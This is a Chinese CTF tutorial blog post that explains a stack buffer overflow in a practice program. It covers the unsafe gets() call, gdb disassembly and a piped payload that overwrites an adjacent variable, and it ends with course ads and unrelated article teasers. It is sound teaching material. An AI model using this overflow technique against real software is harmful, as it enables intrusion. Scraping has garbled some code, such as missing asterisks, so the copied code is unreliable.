当前位置：首页 > news >正文

做网站什么职业/网络营销网站设计

news 文章来源：https://blog.csdn.net/qq_53225741/article/details/132219869 2025/2/27 14:04:20

做网站什么职业,网络营销网站设计,wordpress 头像很慢,做网站的分页查询PWN是一个黑客语法的俚语词，自"own"这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个…

PWN是一个黑客语法的俚语词，自"own"这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败（例如：“You
just got pwned!”）。有一个非常著名的国际赛事叫做Pwn2Own，即通过打败对手来达到拥有的目的。

在CTF中PWN题型通常会直接给定一个已经编译好的二进制程序（Windows下的EXE或者Linux下的ELF文件等），然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞，并编写利用代码，通过远程代码执行来达到溢出攻击的效果，最终拿到目标机器的shell夺取flag。

又到了介绍工具的时候了！首先了解一下gdb。

gdb是Linux下常用的一款命令行调试器，拥有十分强大的调试功能。本实验中需要用到的gdb命令如下：

图片1.png

这个工具类似逆向里面的IDA这类的神器。

除了工具还需要知道一些简单的汇编基础，读懂常见的汇编指令是CTF竞赛中PWN解题的基本要求，本实验中需要理解的汇编指令如下：

图片2.png

汇编语言中，esp寄存器用于指示当前函数栈帧的栈顶的位置，函数中局部变量都存储在栈空间中，栈的生长方向是向下的（即从高地址往低地址方向生长）。

缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量，使得溢出的数据覆盖在合法数据上，理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符，但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配，这就为缓冲区溢出埋下隐患。

本文涉及知识点实操练习：
[《CTFPWN练习》](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014103116591300001&pk_campaign=freebuf-
wemedia)（PWN是CTF竞赛中的主要题型之一，主要考查参赛选手的逆向分析、漏洞挖掘以及Exploit编写能力。CTF-
PWN系列实验以最常见的栈溢出为主线，通过由浅入深的方式，一步一步讲解栈溢出攻击原理与实践，同时详细介绍了Linux下GDB调试器的基本使用方法。）。

先看题目描述，跟看web源码一样重要，主机/home/test/1目录下有一个pwn1程序，执行这个程序的时候可以输入数据进行测试，pwn1程序会输出Please
try again.的提示信息，请对pwn1程序进行逆向分析和调试，找到程序内部的漏洞，并构造特殊的输入数据，使之输出Congratulations,
you pwned it.信息。

首先第一步源码审计在实际的CTF竞赛的PWN题目中，一般是不会提供二进制程序的源代码的。这里为了方便大家学习，给出二进制程序的C语言源代码供大家分析，以源码审计的方式确定漏洞所在位置，方便后续进行汇编级别的分析。

（在没有源代码的情况下，我们通常使用IDA Pro对二进制程序进行逆向分析，使用IDA的Hex-
Rays插件可以将反汇编代码还原为C语言伪代码，可以达到类似源代码的可读效果，在后期的实验中会专门对IDA的使用进行讲解）

使用cd /home/test/1切换到程序所在目录，执行cat pwn1.c即可看到源代码：

``#include <stdio.h>int main(int argc, char argv){int modified;char buffer[64];modified = 0;gets(buffer); // 引发缓冲区溢出if (modified != 0){printf(“Congratulations, you pwned it.\n”);}else{printf(“Please try again.\n”);}return 0;}


我们看这里使用gets函数读取输入数据时，并不会对buffer缓冲区的长度进行检查，输入超长的输入数据时会引发缓冲区溢出。漏洞找到了，我们来看利用过程执行gdb pwn1即可开始通过gdb对pwn1进行调试，现在我们需要阅读main函数的汇编代码，在gdb中执行disas
main命令即可：![图片3.png](https://img-blog.csdnimg.cn/img_convert/1464da519212f5d1df248cf6cfc9d1e2.jpeg)下面是对main函数中的汇编代码的解释：``0x080482a0 <+0>: push %ebp0x080482a1 <+1>: mov %esp,%\ebp0x080482a3 <+3>: and $0xfffffff0,%\esp; esp = esp - 0x60，即在栈上分配0x60）字节的空间0x080482a6 <+6>: sub $0x60,%\esp; modified变量位于esp + 0x5C处，将其初始化为00x080482a9 <+9>: movl $0x0,0x5c(%\esp); buffer位于esp + 0x1C处0x080482b1 <+17>: lea 0x1c(%\esp),%eax0x080482b5 <+21>: mov %eax,(%\esp); 调用gets(buffer)读取输入数据0x080482b8 <+24>: call 0x8049360 <gets>; 判断modified变量的值是否是00x080482bd <+29>: cmpl $0x0,0x5c(%\esp); 如果modified的值等于0，就跳转到 0x080482d20x080482c2 <+34>: je 0x80482d2 <main+50>; modified不为0，打印成功提示0x080482c4 <+36>: movl $0x80b3eec,(%\esp)0x080482cb <+43>: call 0x8049500 <puts>0x080482d0 <+48>: jmp 0x80482de <main+62>; modified为0，打印失败提示0x080482d2 <+50>: movl $0x80b3f0b,(%\esp)0x080482d9 <+57>: call 0x8049500 <puts>0x080482de <+62>: mov $0x0,%\eax0x080482e3 <+67>: leave0x080482e4 <+68>: ret````通过对上面的汇编代码进行分析，我们知道buffer位于esp+0x1C处，而modified位于esp+0x5C处，两个地址的距离为0x5C - 0x1C
= 0x40，即64，刚好为buffer数组的大小。因此当我们输入的数据超过64字节时，modified变量就可以被覆盖。下面在gdb中进行验证，在gdb中执行b 0x080482bd命令对gets的下一条指令下一个断点：![图片4.png](https://img-blog.csdnimg.cn/img_convert/5c2e416ee24ad101ad43f4b8a5d667ab.jpeg)在gdb中执行r命令，让被调试的pwn1程序跑起来，就可以输入数据进行测试了，这里我们输入64个A以及1个B（即AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB），按下Enter键程序就在断点处断下了：![图片5.png](https://img-blog.csdnimg.cn/img_convert/50de82877931ab5c62e8c5ada2307ef9.jpeg)在gdb中输入x
$esp+0x5C，查看modified变量的值已经被修改成了0x00000042，而0x42就是字符’B’的ASCII值，表明我们成功用输入数据的第65个字节覆盖了modified变量：![image](https://img-blog.csdnimg.cn/img_convert/fe9d5f89bf1d99015e1301d0a409eb0e.jpeg)在gdb中连续两次执行ni命令，可以看到je指令没有跳转，说明modified的值不为0，程序进入输出通过信息的if语句分支：![图片7.png](https://img-blog.csdnimg.cn/img_convert/b40d70bdafeba39f4316d3cff0f7cfae.jpeg)在gdb中输入c命令就可以让程序继续执行，看到输出了通过提示信息：![图片8.png](https://img-blog.csdnimg.cn/img_convert/72d8bdadfbf70233878f65946014bab5.jpeg)通过上面的步骤我们已经知道了如果控制输入数据来进行攻击，以达到进入if语句分支的目的。下面我们就可以通过构造输入数据进行攻击了。如果你还没有退出gdb，输入q命令就可以退出gdb。下面通过python语句构造输入数据，然后通过管道传给pwn1程序，执行命令python -c
"print 'A'64+'B'" | ./pwn1![图片9.png](https://img-blog.csdnimg.cn/img_convert/613f81ca7a57643e4871768cc591d9a9.jpeg)看到已经成功发起了溢出攻击，程序被你PWN掉啦！B'" | ./pwn1[外链图片转存中...(img-oUak6lkK-1691677019926)]看到已经成功发起了溢出攻击，程序被你PWN掉啦！## 最后
对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。  
![](https://img-blog.csdnimg.cn/9663e318367645b8bf9d8c9858f43905.png#pic_center)
同时每个成长路线对应的板块都有配套的视频提供：
![](https://img-blog.csdnimg.cn/95c51a2db203495cacd852a94dbe0814.png)
![](https://img-blog.csdnimg.cn/c62dc5cb223b4472b26ab6661feac302.png)
当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。  
![](https://img-blog.csdnimg.cn/69ab0c080ea94332b51bd55d6afec28f.png)
**因篇幅有限，仅展示部分资料，有需要的小伙伴，可以【点下方卡片】免费领取：**

CTF-记一次PWN练习

PWN是一个黑客语法的俚语词，自"own"这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个…...

编程日记 2023/8/11 0:52:01

《golang设计模式》第一部分·创建型模式-04-工厂方法模式（Factory Method）

文章目录 1 概述2.1 角色2.2 类图 2 代码示例2. 1 设计2.2 代码2.3 类图 3. 简单工厂3.1 角色3.2 类图3.3 代码示例3.3.1 设计3.3.2 代码3.3.3 类图 1 概述工厂方法类定义产品对象创建接口，但由子类实现具体产品对象的创建。 2.1 角色 Product（抽象产…...

编程日记 2023/8/11 0:51:00

redis的配置和使用、redis的数据结构以及缓存遇见的常见问题

目录 1.缓存 2.redis不仅仅可以做缓存，只不过说他的大部分场景，是做缓存。本地缓存重启后缓存里的东西就没有了，但是redis有。 3.redis有几个特性:查询快，但是是放到内存里的〈断电或者重启，数据就丢了)&#xff0c…...

编程日记 2023/8/11 0:49:58

在Ubuntu系统下修改limits.conf不生效

文章目录前言尝试过程总结前言最近遇到的一个问题，在Ubuntu系统下修改/etc/security/limits.conf不生效，查了多种资料都说不用重启，但是我改完就是不生效，多次尝试之后发现Ubuntu系统有毒。尝试过程通过 ulimit -n 命令可…...

编程日记 2023/8/11 0:48:57

selenium 选项 chrome_options

当前环境： Windows 10 Python 3.7 selenium 3.141.0 Google Chrome 115.0.5790.110 （64 位） 一种方法： from selenium import webdriverif __name__ __main__:# chrome 选项配置chrome_options webdriver.ChromeOptions(…...

编程日记 2023/8/11 0:47:56

自然语言处理（Natural Language Processing，NLP）

自然语言处理(Natural Language Processing，NLP)是人工智能领域的一个重要分支，旨在使计算机能够理解、处理和生成人类自然语言。NLP 的目标是让计算机能够像人类一样有效地理解和交流，从而实现更自然、更智能的人机交互。 NLP的理解概括&…...

编程日记 2023/8/11 0:46:55

基于机器学习的库存需求预测 -- 机器学习项目基础篇（12）

在本文中，我们将尝试实现一个机器学习模型，该模型可以预测在不同商店销售的不同产品的库存量。导入库和数据集 Python库使我们可以轻松地处理数据，并通过一行代码执行典型和复杂的任务。 Pandas -此库有助于以2D阵列格式加载数据帧&#…...

编程日记 2023/8/11 0:45:54

【D3S】集成smart-doc并同步配置到Torna

目录一、引言二、maven插件三、smart-doc.json配置四、smart-doc-maven-plugin相关命令五、推送文档到Torna六、通过Maven Profile简化构建一、引言 D3S（DDD with SpringBoot）为本作者使用DDD过程中开发的框架，目前已可公开查看源码&#…...

编程日记 2023/8/11 0:44:53

网络安全设备及部署

什么是等保定级？ 之前了解了下等保定级，接下里做更加深入的探讨文章目录一、网路安全大事件1.1 震网病毒1.2 海康威视弱口令1.3 物联网Mirai病毒1.4 专网黑天安事件1.5 乌克兰停电1.6 委内瑞拉电网1.7 棱镜门事件1.8 熊猫烧香二、法律法规解读三、安…...

编程日记 2023/8/11 0:43:52

LVS集群

目录 1、lvs简介： 2、lvs架构图： 3、 lvs的工作模式： 1） VS/NAT： 即（Virtual Server via Network Address Translation） 2）VS/TUN ：即（Virtual Server v…...

编程日记 2023/8/11 0:42:51

Kubernetes(K8s)从入门到精通系列之十二：安装和设置 kubectl

Kubernetes K8s从入门到精通系列之十二：安装和设置 kubectl 一、kubectl二、在 Linux 系统中安装并设置 kubectl1.准备工作2.用 curl 在 Linux 系统中安装 kubectl3.用原生包管理工具安装三、验证 kubectl 配置四、kubectl 的可选配置和插件1.启用 shell 自动补全功…...

编程日记 2023/8/11 0:41:50

探索 TypeScript 元组的用例

元组扩展了数组数据类型的功能。使用元组，我们可以轻松构造特殊类型的数组，其中元素相对于索引或位置是固定类型的。由于 TypeScript 的性质，这些元素类型在初始化时是已知的。使用元组，我们可以定义可以存储在数组中每个位置的数…...

编程日记 2023/8/11 0:40:49

Pytorch使用NN神经网络模型实现经典波士顿boston房价预测问题

Pytorch使用多层神经网络模型实现经典波士顿boston房价预测问题波士顿房价数据集介绍波士顿房价数据集是一个经典的机器学习数据集，用于预测波士顿地区房屋的中位数价格。该数据集包含了506个样本，每个样本有13个特征，包括城镇的各种指标&…...

编程日记 2023/8/11 0:39:48

微服务间消息传递

微服务间消息传递微服务是一种软件开发架构，它将一个大型应用程序拆分为一系列小型、独立的服务。每个服务都可以独立开发、部署和扩展，并通过轻量级的通信机制进行交互。应用开发 common模块中包含服务提供者和服务消费者共享的内容provider模块是…...

编程日记 2023/8/11 0:38:46

python——案例16：约瑟夫生者死者链队列

约瑟夫游戏的大意是：一条船上有30个人，因为在海上遇到风暴因此船长告诉乘客，必须牺牲15个人，并议定30个人围成一圈， 由第一个人数起，依次报数，数到第9人，便把他投入大海中&#xff…...

编程日记 2023/8/11 0:37:45

【人工智能前沿弄潮】—— 玩转SAM(Segment Anything)

玩转SAM(Segment Anything) 官网链接： Segment Anything | Meta AI (segment-anything.com) github链接： facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links fo…...

编程日记 2023/8/11 0:36:44

每日一题——合并两个有序的数组

题目给出一个有序的整数数组 A 和有序的整数数组 B ，请将数组 B 合并到数组 A 中，变成一个有序的升序数组数据范围：0≤n,m≤100，∣Ai∣<100，∣Bi∣<100 注意： 1.保证 A 数组有足够的空间存放 B …...

编程日记 2023/8/11 0:35:42

MPP架构和Hadoop架构的区别

1. 架构的介绍 mpp架构是将许多数据库通过网络连接起来，相当于将一个个垂直系统横向连接，形成一个统一对外的服务的分布式数据库系统。每个节点由一个单机数据库系统独立管理和操作该物理机上的的所有资源（CPU，内存等&#xff09…...

编程日记 2023/8/11 0:34:41

Java02-迭代器，数据结构,List,Set ,Map,Collections工具类

目录什么是遍历？ 一、Collection集合的遍历方式 1.迭代器遍历方法流程案例 2. foreach（增强for循环）遍历案例 3.Lamdba表达式遍历案例二、数据结构数据结构介绍常见数据结构栈（Stack） 队列&a…...

编程日记 2023/8/11 0:33:41

福布斯发布2023云计算100强榜单，全球流程挖掘领导者Celonis排名17

近日，全球流程挖掘领导者Celonis入选福布斯2023 年云计算 100 强榜单，估值130亿美元，排名第17，Celonis已经是连续三年跻身榜单前20名。本次榜单由福布斯与Bessemer Venture Partners和Salesforce Ventures联合发布，旨…...

编程日记 2023/8/11 0:32:39

计算机网络 MAC地址

...

编程日记 2023/8/11 0:31:38

Jay17 2023.8.10日报

笔记【python反序列化】序列化类对象->字节流（字符串） 反序列化字节流->对象 python反序列化没PHP这么灵活，没这么多魔术方法。 import pickle import os class ctfshow(): def init(self): self.username0 self.password0 d…...

编程日记 2023/8/11 0:30:37

Winform中DatagridView 表头实现一个加上一个checkBox，实现全选选项功能

实现效果点击checkBox1或者直接在第一列列表头点击即可实现代码实现我的datagridview叫dgv 我在datagridview已经默认添加了一个DataGridViewCheckBoxColumn，勾选时value为1，不勾选时value为0 第一种通过可视化拖动一个checkBox来实现拖动组…...

编程日记 2023/8/11 0:29:37

rust基础

这是笔者学习rust的学习笔记（如有谬误，请君轻喷） 参考视频： https://www.bilibili.com/video/BV1hp4y1k7SV参考书籍：rust程序设计语言：https://rust.bootcss.com/title-page.htmlmarkdown地址：h…...

编程日记 2023/8/11 0:28:34

剑指offer39.数组中出现次数超过一半的数字

这个题非常简单，解法有很多种，我用的是HashMap记录每个元素出现的次数，只要次数大于数组长度的一半就返回。下面是我的代码： class Solution {public int majorityElement(int[] nums) {int len nums.length/2;HashMap<Integ…...

编程日记 2023/8/11 0:27:33

spring技术栈面试题

1 Spring支持的事务管理类型有哪些？你在项目中使用哪种方式？ Spring支持两种类型的事务管理： 编程式事务管理：这意味你通过编程的方式管理事务，给你带来极大的灵活性，但是难维护。声明式事务管理&#x…...

编程日记 2023/8/11 0:26:32

Android Glide MemorySizeCalculator计算值,Kotlin

Android Glide MemorySizeCalculator计算值,Kotlin for (i in 100..1000 step 50) {val calculator MemorySizeCalculator.Builder(this).setMemoryCacheScreens(i.toFloat()).setBitmapPoolScreens(i.toFloat()).setMaxSizeMultiplier(0.8f).setLowMemoryMaxSizeMultiplier(0…...

编程日记 2023/8/11 0:25:31